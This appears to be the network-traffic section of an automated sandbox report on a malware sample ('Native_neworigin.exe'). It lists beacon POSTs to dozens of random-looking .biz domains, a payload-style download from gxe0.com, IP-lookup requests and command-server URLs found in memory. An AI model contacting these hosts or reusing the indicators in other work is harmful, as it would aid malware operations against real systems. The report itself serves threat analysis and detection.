                      Source: global trafficHTTP traffic detected: POST /qklr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ytctnunms.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 832
                      Source: global trafficHTTP traffic detected: POST /c HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: myups.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 832
                      Source: global trafficHTTP traffic detected: POST /rjreynucnxubyan HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: myups.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 832
                      Source: global trafficHTTP traffic detected: POST /rsqlwjdrwk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: oshhkdluh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 832
                      Source: global trafficHTTP traffic detected: POST /khvhi HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yunalwv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 832
                      Source: global trafficHTTP traffic detected: POST /xalserxg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yunalwv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 832
                      Source: global trafficHTTP traffic detected: POST /wt HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lrxdmhrr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 832
                      Source: global trafficHTTP traffic detected: POST /txsxc HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: wllvnzb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 832
                      Source: global trafficHTTP traffic detected: POST /klerpi HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gnqgo.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 832
                      Source: global trafficHTTP traffic detected: POST /qehuuaxgtrfd HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jhvzpcfg.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 832
                      Source: global trafficHTTP traffic detected: POST /srktyhawgjwb HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: acwjcqqv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 832
                      Source: global trafficHTTP traffic detected: POST /wdbsnc HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yauexmxk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 832
                      Source: global trafficHTTP traffic detected: POST /yngosjtj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: iuzpxe.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 832
                      Source: global trafficHTTP traffic detected: POST /xwpgxeg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: sxmiywsfv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 832
                      Source: global trafficHTTP traffic detected: POST /hppl HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ftxlah.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 832
                      Source: global trafficHTTP traffic detected: POST /rrrklmujfcwnchb HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: typgfhb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 832
                      Source: global trafficHTTP traffic detected: POST /pggbsfikilutqo HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gvijgjwkh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 832
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: global trafficHTTP traffic detected: GET /yak2/233_Juqmtmyadyy HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: gxe0.com
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                      Source: global trafficDNS traffic detected: DNS query: gxe0.com
                      Source: global trafficDNS traffic detected: DNS query: pywolwnvd.biz
                      Source: global trafficDNS traffic detected: DNS query: ssbzmoy.biz
                      Source: global trafficDNS traffic detected: DNS query: cvgrf.biz
                      Source: global trafficDNS traffic detected: DNS query: api.ipify.org
                      Source: global trafficDNS traffic detected: DNS query: npukfztj.biz
                      Source: global trafficDNS traffic detected: DNS query: przvgke.biz
                      Source: global trafficDNS traffic detected: DNS query: zlenh.biz
                      Source: global trafficDNS traffic detected: DNS query: knjghuig.biz
                      Source: global trafficDNS traffic detected: DNS query: uhxqin.biz
                      Source: global trafficDNS traffic detected: DNS query: anpmnmxo.biz
                      Source: global trafficDNS traffic detected: DNS query: lpuegx.biz
                      Source: global trafficDNS traffic detected: DNS query: s82.gocheapweb.com
                      Source: global trafficDNS traffic detected: DNS query: vjaxhpbji.biz
                      Source: global trafficDNS traffic detected: DNS query: xlfhhhm.biz
                      Source: global trafficDNS traffic detected: DNS query: ifsaia.biz
                      Source: global trafficDNS traffic detected: DNS query: saytjshyf.biz
                      Source: global trafficDNS traffic detected: DNS query: vcddkls.biz
                      Source: global trafficDNS traffic detected: DNS query: fwiwk.biz
                      Source: global trafficDNS traffic detected: DNS query: tbjrpv.biz
                      Source: global trafficDNS traffic detected: DNS query: deoci.biz
                      Source: global trafficDNS traffic detected: DNS query: gytujflc.biz
                      Source: global trafficDNS traffic detected: DNS query: qaynky.biz
                      Source: global trafficDNS traffic detected: DNS query: bumxkqgxu.biz
                      Source: global trafficDNS traffic detected: DNS query: dwrqljrr.biz
                      Source: global trafficDNS traffic detected: DNS query: nqwjmb.biz
                      Source: global trafficDNS traffic detected: DNS query: ytctnunms.biz
                      Source: global trafficDNS traffic detected: DNS query: myups.biz
                      Source: global trafficDNS traffic detected: DNS query: oshhkdluh.biz
                      Source: global trafficDNS traffic detected: DNS query: yunalwv.biz
                      Source: global trafficDNS traffic detected: DNS query: jpskm.biz
                      Source: global trafficDNS traffic detected: DNS query: lrxdmhrr.biz
                      Source: global trafficDNS traffic detected: DNS query: wllvnzb.biz
                      Source: global trafficDNS traffic detected: DNS query: gnqgo.biz
                      Source: global trafficDNS traffic detected: DNS query: jhvzpcfg.biz
                      Source: global trafficDNS traffic detected: DNS query: acwjcqqv.biz
                      Source: global trafficDNS traffic detected: DNS query: lejtdj.biz
                      Source: global trafficDNS traffic detected: DNS query: vyome.biz
                      Source: global trafficDNS traffic detected: DNS query: yauexmxk.biz
                      Source: global trafficDNS traffic detected: DNS query: iuzpxe.biz
                      Source: global trafficDNS traffic detected: DNS query: sxmiywsfv.biz
                      Source: global trafficDNS traffic detected: DNS query: vrrazpdh.biz
                      Source: global trafficDNS traffic detected: DNS query: ftxlah.biz
                      Source: global trafficDNS traffic detected: DNS query: typgfhb.biz
                      Source: global trafficDNS traffic detected: DNS query: esuzf.biz
                      Source: global trafficDNS traffic detected: DNS query: gvijgjwkh.biz
                      Source: global trafficDNS traffic detected: DNS query: qpnczch.biz
                      Source: global trafficDNS traffic detected: DNS query: brsua.biz
                      Source: unknownHTTP traffic detected: POST /lcoyxsnwq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 832
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Wed, 20 Nov 2024 09:26:34 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Wed, 20 Nov 2024 09:26:34 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Wed, 20 Nov 2024 09:26:42 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Wed, 20 Nov 2024 09:26:43 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: Native_neworigin.exe, 00000009.00000002.2397017499.000000000090A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.234.222.143/ksc
                      Source: Native_neworigin.exe, 00000013.00000002.2586371750.0000000006234000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/
                      Source: Native_neworigin.exe, 00000013.00000002.2586371750.0000000006234000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/nsnnyu
                      Source: Native_neworigin.exe, 00000013.00000002.2586371750.0000000006234000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107:80/nsnnyu
